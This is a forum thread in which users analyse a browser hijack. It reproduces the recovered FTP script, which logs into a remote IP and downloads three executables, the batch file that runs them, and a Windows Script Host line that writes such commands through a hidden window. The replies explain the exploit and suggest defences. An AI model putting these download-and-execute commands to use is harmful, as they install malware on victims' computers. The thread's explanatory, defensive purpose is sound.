Have you seen this? O ftp

[Jaded]

I was browsing what appeared to be a legitimate web site when my screen blacked out and blinked a few times.

I suspended the modem immediately and began the search.

Found several files but none detected by AV / Ad etc.

First one:

open 207.58.159.14
tmpacct
12345
bin
get newdevin.exe
get TVM_B5.EXE
get 06wu29rd.exe
bye


And the second one:

if not exist C:\WINDOWSstatuslog ftp -s
if exist newdevin.exe newdevin.exe
if exist TVM_B5.EXE TVM_B5.EXE
if exist 06wu29rd.exe 06wu29rd.exe


I couldn't find any of the referenced files so I may have shut it down in time.

I didn't find much on the web. Anyone seen the exe files before?

[Vin DSL]

Looks like it's a hijack script to me!

Check your browser and see if it changed your homepage, search page, added any bookmarks, et cetera...

[Spathiphyllum]

I've not observed or looked for these *.exe files before. But I'm not sure I understand the post.

The stuff you posted looks like a couple of snippets of batch files. The first is a series of cmds to login in to a certain IP after providing a name/pwd, changing to binary, dload three *.exe, and log off. The second series seems to be a search.

You are running MSIE? Do you have Windows Scripting Host enabled? Sounds like a cross-scripting exploit:

Check out>
Bugtraq: RE: Still Vulnerable in MSIE
http://seclists.org/lists/bugtraq/2004/May/0153.html
http://seclists.org/lists/bugtraq/2004/May/0177.html

and then:
Internet Explorer Object Data Remote Execution Vulnerability
http://www.eeye.com/html/Research/Ad...D20030820.html

You'll have to read the articles to understand the code, but your answer is there.

It would appear that when you click on the evil url, you are redirected (in a hidden window, multiple times perhaps) to an evil IP addy and the WSH initiated, probably through ActiveX or JS.

object.Run(strCommand, [intWindowStyle], [bWaitOnReturn])
Run method
intWindowStyle - 6
Description - Minimizes the specified window and activates the next top-level window in the Z order.

So from our internet linked example (and some homework), we observe the following line among many lines:

wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6);

command /C 'string' - Carries out the command specified by string, and then stops.

echo displays messages

So you are receiving a series of "Run" commands from the OS Windows Scripting Host that say "open a scripting window, minimize(hide) it, write the string to the window and then pass it all to a *.bat file, and immediately return without halting or returning an error and give the focus to the top window. In essence, it's a sneaky way to write code to a batch file and run it underneath your field of view, probably while you browse.

The completed batch file is then a series of commands to surreptitiously log you in to a cracker's site, download some binary files, and log you off. It checks to see if an ftp statuslog is being created and if it isn't, then it runs ftp again and uses the commands in the batch file it just created to run the newly downloaded files.

What you could be looking for are newly created batch files that look suspicious... see if an incomplete one exists and is waiting to get finished. Pretty damn sneaky. And another reason to harden your browser and use the Proxomitron (or other local web proxy).

[Vin DSL]

Those damn hijackers usually load a batch file on your machine, place a shortcut on your desktop, then exectute it automatically from there without asking.

It happened to my wife all the time, 'cause she uses Internet Explorer. I'd ask, "Hey, why are you running MSN for a portal (or whatever)?" She'd say, "I thought you did it, so I left it alone."

After about the 10th time, I installed Spybot S&D Residence, and it started catching those things in the act, trying to change the registry and so forth.

This ALWAYS happens on otherwise reputable sites too, I might add...

[Vin DSL]

Here's a snap of the interface...

• 

[Vin DSL]

LoL! Sound familiar?

http://www.eggheadcafe.com/ng/micros.../post40616.asp

[Vin DSL]

Heh! Here's your IP...

http://207.58.159.14/

[Vin DSL]

Found this in Google's cache...

http://66.102.7.104/search?q=cache:D...slog+ftp&hl=en

[Vin DSL]

I like this advice from the link above...

To stop from being hijacked, just switch from IE (which is terribly insecure, and requires patches all the time to fix vulnerabilities) to Mozilla.

Mozilla will not allow the homepage to be switched by hijackers, plus it has more features than IE, and is more secure.

Or, you can download mozilla firefox, which is faster and has most security features enabled by default.

[Jaded]

I searched the site last night and cleaned my pc this morning but was curious about the individual files uploaded to my pc.

I use IE, NS, and Firefox for cross-browser testing of web content and I do have the evil JS enabled for that purpose. I am currently working on a php site with content selection based on availability of JS/FLash on the client machine. The static site has auto-sizing to get rid of all the blank space and the Flash site is full-screen.

I have already tweaked the forum to full-size within Flash and made the necessary link changes but I have been too busy to work on it lately.

I am using Norton FW and AV on this machine plus a router firewall, Spysweeper, and AdAware.

At my office I installed AVG/ZoneAlarm/Spysweeper/Adaware and have had NO problems in almost a year. But then again, I do much more work at home.

It just pisses me off that I have to waste time on security and cleaning out the junk that gets in.

[Jaded]

Oh yeah, I WILL restrict my IE use for testing purposes from now on.

Anyone have or know of a simple way to log ALL file changes and port acivity? I have the power and the space but not the time.

[Spathiphyllum]

It just pisses me off that I have to waste time on security and cleaning out the junk that gets in.

Welcome to the wonderful world of sysadmin.

The filenames are quite inconsequential. They can be named anything since the exploit, as it would appear, requires only that the batchfile list and the actual binary names match. From the background I read, many of the binaries are ad related... but who knows what ultimately the function of those binaries are.

Another sinister component is that the cracker can rename the files at will which makes it harder to detect by AV/Ad removal software. The security software must learn the pattern of exploit rather than really detect the individual files by name since they are such a dynamic feature of the exploit.

This really is a sneaky trick. Leave it to some [numerous descriptive expletives deleted] crackers to destroy a potentially useful tool of scripting.

Anyone know the mechanism for reporting sites that do this? Apparently, MS is suing a company that used this trick to redirect some customers. I'd pass names to MS and anyone else that would listen if I ran across the exploit directly.

[Spathiphyllum]

This ALWAYS happens on otherwise reputable sites too, I might add...

You might need to redefine reputable.

Can you provide an example site? I'd be curious to see a "live" one.

[Vin DSL]

You might need to redefine reputable.

Can you provide an example site? I'd be curious to see a "live" one.

Next time I run across one, I'll post here.

BTW, here's a nice, simple tutorial on how to protect yourself against this sort of nonsense, and/or how to deal with it once it happens.

http://www.pcstats.com/articleview.c...id=1579&page=1

This article hits all the high points - exactly what I would have written, had I been doing it...

[Spathiphyllum]

Anyone have or know of a simple way to log ALL file changes and port acivity?...

Logging all port activity could use up resources quick; I relegate that task to a dedicated firewall since it is the best balance of alarm and report for my network. Any more analysis would be too extensive since I'm not running the NSA here.

As far as file changes, you could do a search for the equivalent version of linux OS "tripwire". It's a useful utility to do the exact task you want. I'll use one on the firewall but don't typically run one on other systems except when setting up a honeypot. I'm guessing there's a Windows OS equivalent.